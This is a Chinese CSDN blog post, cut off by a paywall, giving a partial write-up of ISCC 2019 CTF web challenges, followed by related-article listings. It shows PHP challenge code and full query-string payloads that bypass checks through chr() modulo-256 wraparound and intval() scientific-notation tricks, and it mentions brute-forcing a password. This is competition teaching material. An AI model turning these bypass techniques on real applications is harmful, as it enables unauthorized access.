ISCC-2019部分wp

最新推荐文章于 2024-05-21 10:04:02 发布
最新推荐文章于 2024-05-21 10:04:02 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 赛题复现 CTF学习 文章标签: ISCC2019
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/89853403
版权

web

1、web2

 很清楚的提示,破解三位数的密码,同时也需使验证码正确,抓包进行爆破得到flag:

 2、web1

 <?php
error_reporting(0);
require 'flag.php';
$value = $_GET['value'];
$password = $_GET['password'];
$username = '';

for ($i = 0; $i < count($value); ++$i) {
    if ($value[$i] > 32 && $value[$i] < 127) unset($value);
    else $username .= chr($value[$i]);
    if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
        echo 'Hello '.$username.'!', '<br>', PHP_EOL;
        echo $flag, '<hr>';
    }
}

highlight_file(__FILE__);

审计代码,

1、需要绕过$value[$i] > 32 && $value[$i] < 127的判断

2、需要满足$username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333

chr()会自动进行mod256,所以chr(321)=A,because A=65(256),第一个判断我们可以绕过,第二个可以用十六进制或科学计数法绕过

十六进制绕过payload:?value[]=375&value[]=307&value[]=364&value[]=355&value[]=304&value[]=365&value[]=357&value[]=351&value[]=340&value[]=367&value[]=351&value[]=329&value[]=339&value[]=323&value[]=323&value[]=306&value[]=304&value[]=305&value[]=313&password=0x2332
十六进制方法在我本机测试的时候通不过,可能是php版本的问题,推荐使用科学计数法绕过。

科学计数法绕过:?value[]=375&value[]=307&value[]=364&value[]=355&value[]=304&value[]=365&value[]=357&value[]=351&value[]=340&value[]=367&value[]=351&value[]=329&value[]=339&value[]=323&value[]=323&value[]=306&value[]=304&value[]=305&value[]=313&password=22.2e3
intval(22.2e3)=22,intval(22.2e3+1)=22201

拿到flag:

3、web4

 <?php
error_reporting(0);
include("flag.php");
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
    $query = $parsed["query"];
    $parsed_query = parse_str($query);
    if($pa
最低0.47元/天 解锁文章
大千SS
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ISCC 2022年第19届信息安全与对抗技术竞赛 练武题WP
monster663的博客
05-04 4771
ISCC 2022年第19届信息安全与对抗技术竞赛 练武题WP
[xueqi]ISCC 2019 writeup 信息安全与对抗-解题思路xueqi
XUEQI的博客
10-12 1260
ISCC 2019 writeup-全国大学生信息安全与对抗技术竞赛 解题思路xueqi WEB Web1 题目地址:http://39.100.83.188:8001 <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $use...
BUUCTF:Misc 解析(五)
最新发布
Flag少侠的博客
05-21 3794
被劫持的神秘礼物(Wireshark 追踪流 & MD5 加密)、[BJDCTF2020] 认真你就输了(Binwalk 提取)、被偷走的文件(Wireshark 追踪流 & Binwalk 提取 & Archpr 爆破)、、[BJDCTF2020] 藏藏藏(Foremost 提取 & QR Research 扫码)、[GXYCTF2019] 佛系青年(ZIP 伪加密 & 佛论禅解码)、[BJDCTF2020] 你猜我是个啥(file 查看& mv 重命名 & WinHex 搜索)、刷新过的图片、snak
隐藏的信息
qq_43759478的博客
05-23 716
附件内容:0126 062 0126 0163 0142 0103 0102 0153 0142 062 065 0154 0111 0121 0157 0113 0111 0105 0132 0163 0131 0127 0143 066 0111 0105 0154 0124 0121 060 0116 067 0124 0152 0102 0146 0115 0107 065 0154 ...
攻防世界_MISC之碎纸机11
金 帛的博客
09-12 2173
攻防世界刷题日记
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1468
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
ISCC-2015-细节决定成败.rar
09-30
标题“ISCC-2015-细节决定成败.rar”暗示了这个压缩包可能包含的是一个关于2015年国际软件构造大会(ISCC)的资料集,其中的重点是讨论了在软件开发过程中细节的重要性。ISCC是一个专注于软件构造、编程方法、软件工程...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
iscc-cli:国际会议
05-09
iscc-cli-命令行工具 一个基于为数字媒体文件创建ISCC代码的命令行工具。目录背景国际标准内容规范是针对分散式内容标识的的提议。 ISCC代码是根据内容本身通过算法生成的,并提供了许多强大的功能,例如内容相似性...
ISCC-parasite
04-01
ISCC-parasite 是一个基于R语言的项目,专注于研究和分析寄生虫(parasite)相关的数据。该项目可能包含一系列工具和方法,用于处理、统计和可视化寄生虫生物学研究中的数据。R语言是一种广泛应用在统计计算和图形...
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
ISCC-2020-J07
03-26
【标题】"ISCC-2020-J07"是一个可能代表某个IT竞赛或项目的标识符,可能是2020年ISCC(International Symposium on Computer and Communication)的一部分,分类为J07,这通常意味着它属于特定的技术或研究领域。...
Python如何把八进制转换成ASCII码
DG_s1mple
03-11 1512
做题途中拿到一串八进制字符串 0126 062 0126 0163 0142 0103 0102 0153 0142 062 065 0154 0111 0121 0157 0113 0111 0105 0132 0163 0131 0127 0143 066 0111 0105 0154 0124 0121 060 0116 067 0124 0152 0102 0146 0115 0107 065 0154 0130 062 0116 0150 0142 0154 071 0172 0144 0104
XCTF-MISC-碎纸机11
weixin_45723896的博客
07-09 376
逐个查看图片,发现图片拼接起来应该是二维码。由于图片的名字没有顺序,尝试其他顺序,按照时间顺序排序之后重命名为flag。系统会按照时间顺序自动命名。命名之后利用在线图片拼接进行拼接图片,这里一定要按照命名的顺序进行拼接,否则拼接不出来。然后直接扫描扫不出来,使用stegsolve把图片处理成黑白的再扫描。从碎纸机中拿到了一部分文件,下载附件,打开是很多图片,然后扫描直接得到flag。
【攻防世界-misc】碎纸机11
weixin_73625393的博客
11-29 784
1.下载并解压文件,打开文件夹,点击查看,设置为“详细信息”,变成下图样子,本来就是就不动,如果设置不了,在图片中这个界面,按住Ctrl键,滚动鼠标中的圆轮缩小,也会出现这个界面。到这里会PS的可以轻松更改,这里的话我不会,因此另一种解法就是将图片进行编辑,打开图片后,点击编辑图像。将图片另存为,并用CQR二维码扫描器打开,获取到flag值。3.使用这个网站将图片进行合并,将所有图片按顺序上传。2.全选后,右键重命名,默认为第一个。按照下图步骤设置,最后下载图片。点击太阳图标,设置曝光度。
攻防世界-难度1-Misc总结
Welcome To Myon'Blog !
03-05 5099
攻防世界-难度1-Misc总结 ; 主要针对Misc入门、图片隐写; kali linux、Stegsolve.jar、010Editor、WinHex、QR Research、Ziperello、ARCHPR、RX-SSTV、IDLE、Bandizip、7zFM、Firefox、SilentEye、DeepSound、PS、Wireshark;binwalk、foremost、zsteg、strings、grep、stegpy、file、checksec、pngcheck、convert、montage
iscc2019
wuerror的博客
06-05 950
iscc2019 misc welcome 加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串01100110011011000110000101100111011110110100100101010011010000110100001101011111010101110100010101001100010000110100111101001101010...
2019第十二届全国大学生信息安全竞赛个人web wp
kkkkkkkkroc的博客
04-22 3896
先吐槽一下这次比赛时常两天好累的说,太菜了, 知识答题题目分值比例好高。 web题目不多。题目不多,好难做。绕的头皮发麻,另外math函数构造的时候,很烧脑。各位师傅各种骚姿势。 题目名称:JustSoso 变量引用绕过和parse那个函数的漏洞 <?php class Handle{ private $handle; public function __wakeu...
2019ISCC writeup(相对简单)-b64_c3VuJTIwYm95-it720.docx
11-29
2019年信息安全挑战大会(ISCC)的CTF安全比赛中,有一道相对简单的题目,题目名为"2019ISCC writeup"。这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值